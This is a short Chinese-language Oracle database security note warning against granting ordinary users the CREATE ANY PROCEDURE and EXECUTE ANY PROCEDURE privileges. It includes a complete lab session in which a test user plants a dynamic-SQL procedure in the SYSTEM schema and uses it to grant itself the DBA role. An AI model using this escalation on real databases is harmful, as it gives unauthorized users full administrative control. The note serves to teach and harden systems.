给一般用户授予 create any procedure、execute any procedure 这2个权限是很不安全的事。
因为 PL/SQL 存储过程默认以定义者(所有者)的权限执行,授权后该用户可以在高权限用户(如 SYSTEM)的模式下创建过程并执行,从而取得dba权限,请一定注意。
排查时可查询 DBA_SYS_PRIVS,确认没有普通用户持有这类带 ANY 的系统权限。
下面是实验过程:
SQL> create user hacker identified by bbk;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure,execute any procedure to hacker;
Grant succeeded.
    SQL> conn hacker/bbk
    
    Connected.
  
    
    SQL> show user
    
    USER is "HACKER"
  
    
    SQL> select * from session_privs;
  
    PRIVILEGE
    
    ----------------------------------------
    
    CREATE SESSION
    
    CREATE ANY PROCEDURE
    
    EXECUTE ANY PROCEDURE
  
    SQL> create procedure system.h1(h1_str in varchar2) as
    
     2 begin
    
     3 execute immediate h1_str;
    
     4 end;
    
     5 /
  
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> select * from session_privs;
    PRIVILEGE
    
    ----------------------------------------
    
    CREATE SESSION
    
    UNLIMITED TABLESPACE
    
    CREATE ANY PROCEDURE
    
    EXECUTE ANY PROCEDURE
  
    SQL> conn hacker/bbk
    
    Connected.
  
    
    SQL> select * from session_privs;
  
    PRIVILEGE
    
    ----------------------------------------
    
    ALTER SYSTEM
    
    AUDIT SYSTEM
    
    CREATE SESSION
    
    ALTER SESSION
    
    RESTRICTED SESSION
    
    CREATE TABLESPACE
    
    ALTER TABLESPACE
    
    MANAGE TABLESPACE
    
    DROP TABLESPACE
    
    UNLIMITED TABLESPACE
    
    CREATE USER
  
...................................
161 rows selected.
SQL> select * from session_roles;
    ROLE
    
    ------------------------------
    
    DBA
    
    SELECT_CATALOG_ROLE
    
    HS_ADMIN_ROLE
    
    EXECUTE_CATALOG_ROLE
    
    DELETE_CATALOG_ROLE
    
    EXP_FULL_DATABASE
  


 
					 
					